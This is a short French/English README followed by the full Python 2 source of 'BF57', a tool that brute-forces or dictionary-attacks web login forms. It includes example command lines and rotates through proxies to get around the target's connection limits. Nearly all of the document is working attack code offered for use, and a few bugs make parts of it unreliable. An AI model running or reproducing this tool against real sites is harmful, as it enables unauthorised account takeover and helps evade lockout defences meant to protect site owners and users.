BF57 Brute Force Web
BF57 permet d'effectué une attaque en force brute avec ou sans dictionnaire.
Exemple de commande:
$ ./bf57 -a http://www.site.truc 8 admin 'login' 'password' 'mot de passe incorrect' 'limite de connexion'
Help:
$ ./bf57 -h
BF57 Brute Force Generator
GNU/GPL v3
BF57 allows a website to attack by brute force or dictionary
Create by Be Human (craft@ckdevelop.org) Options:
Help: bf57 -h or --help
Functions:
letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg]
numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg]
letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg]
punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg]
all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg]
manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings]
dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg]
Option:
use list proxy: bf57 -p or --proxy [file] [loops]
Examples:
without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!"
manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty"
with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list
with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import urllib, urllib2, string, sys, os
intro="""BF57 Brute Force Generator
GNU/GPL v3
BF57 allows a website to attack by brute force or dictionary
Create by Be Human (craft at ckdeveloporg)"""
class BF57():
def __init__(self):
if (len(sys.argv) < 9):
if (len(sys.argv) < 2):
print("\n[!]Mauvais nombre d\'arguments[!]\n")
self.help()
else:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
self.help()
else:
print("\n[!]Mauvais nombre d\'arguments[!]\n")
self.help()
else:
#white=string.whitespace
white=' '
letters=string.letters
digits=string.digits
puncts=string.punctuation
specs=u"àâäéèêëîïôöûüùçÀÂÄÉÈÊËÎÏÔÖÙÇ"
self.url=sys.argv[2]
self.cnt=0
self.manu=False
if sys.argv[1] == "-l" or sys.argv[1] == "--letters":
self.dico="%s%s%s"%( letters, specs, white )
self.BruteForce()
elif sys.argv[1] == "-n" or sys.argv[1] == "--numerics":
self.dico="%s%s"%( digits, white )
self.BruteForce()
elif sys.argv[1] == "-ld":
self.dico="%s%s%s%s"%( letters, specs, digits, white )
self.BruteForce()
elif sys.argv[1] == "-p" or sys.argv[1] == "--punctuation":
dico="%s%s"%( puncts, white )
self.BruteForce()
elif sys.argv[1] == "-a" or sys.argv[1] == "--all":
self.dico="%s%s%s%s%s"%( letters, specs, digits, puncts, white )
self.BruteForce()
elif sys.argv[1] == "-m" or sys.argv[1] == "--manual":
self.manu=True
self.dico=sys.argv[7]
self.BruteForce()
elif sys.argv[1] == "-d" or sys.argv[1] == "--dico":
self.DicoAttack()
else:
print("\n[!]Option inconnu[!]\n")
self.help()
def DicoAttack(self):
self.fdico = open(sys.argv[8],'r')
#self.dictionary=[]
self.useproxy=False
if (len(sys.argv) > 9):
if sys.argv[9] == "-p" or sys.argv[9] == "--proxy":
self.useproxy=True
listproxy=sys.argv[10]
if self.useproxy:
fproxy = open(listproxy,'r')
self.adrproxy=[]
self.cptproxy=0
for lines in fproxy:
self.adrproxy.append(lines.strip('\n'))
self.login=sys.argv[3]
self.ilogin=sys.argv[4]
self.ipwd=sys.argv[5]
self.merror=sys.argv[6]
self.mlimit=sys.argv[7]
for lines in self.fdico:
self.data = {self.ilogin: self.login,self.ipwd: lines.strip('\n')}
self.request = urllib2.Request(self.url, urllib.urlencode(self.data))
if self.useproxy:
proxy = { 'http' : self.adrproxy[self.cptproxy] }
proxy_handler = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(proxy_handler)
attack = opener.open(self.request).read()
else:
attack = urllib2.urlopen(self.request).read()
if self.mlimit in attack:
print("Limit")
self.cptproxy+=1
if self.cptproxy > len(self.adrproxy):
self.cptproxy=0
elif self.merror in attack:
print(lines.strip('\n'))
else:
if lines.strip('\n').strip(' ') == '':
pass
else:
print("Password: "+lines.strip('\n'))
#self.dictionary.append(lines.strip('\n'))
break
def BruteForce(self):
maxlen=int(sys.argv[3])+1
self.useproxy=False
if (len(sys.argv) > 9):
if self.manu:
if sys.argv[10] == "-p" or sys.argv[10] == "--proxy":
self.useproxy=True
listproxy=sys.argv[11]
else:
if sys.argv[9] == "-p" or sys.argv[9] == "--proxy":
self.useproxy=True
listproxy=sys.argv[10]
if self.useproxy:
fproxy = open(listproxy,'r')
self.adrproxy=[]
self.cptproxy=0
for lines in fproxy:
self.adrproxy.append(lines.strip('\n'))
self.login=sys.argv[4]
self.ilogin=sys.argv[5]
self.ipwd=sys.argv[6]
self.merror=sys.argv[7]
self.mlimit=sys.argv[8]
for a in range(maxlen):
self.allkey('',a)
def allkey(self, chaine, maxlen):
if len(chaine) < maxlen:
for b in range(len(self.dico)):
self.allkey(chaine+self.dico[b], maxlen)
else:
if len(chaine) == maxlen:
self.data = {self.ilogin: self.login,self.ipwd: chaine}
self.request = urllib2.Request(self.url, urllib.urlencode(self.data))
self.pOut(chaine)
def pOut(self, chaine):
self.cnt+=1
if self.useproxy:
proxy = { 'http' : self.adrproxy[self.cptproxy] }
proxy_handler = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(proxy_handler)
attack = opener.open(self.request).read()
else:
attack = urllib2.urlopen(self.request).read()
if self.mlimit in attack:
print("Limit")
self.cptproxy+=1
if self.cptproxy > len(self.adrproxy):
self.cptproxy=0
elif self.merror in attack:
print(chaine)
else:
print("Password: "+chaine)
def help(self):
print(intro+"""\n\nOptions:
Help: bf57 -h or --help
Functions:
letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg]
numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg]
letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg]
punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg]
all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg]
manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings]
dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg]
Option:
use list proxy: bf57 -p or --proxy [file] [loops]
Examples:
without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!"
manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty"
with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list
with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3\n""")
BF57()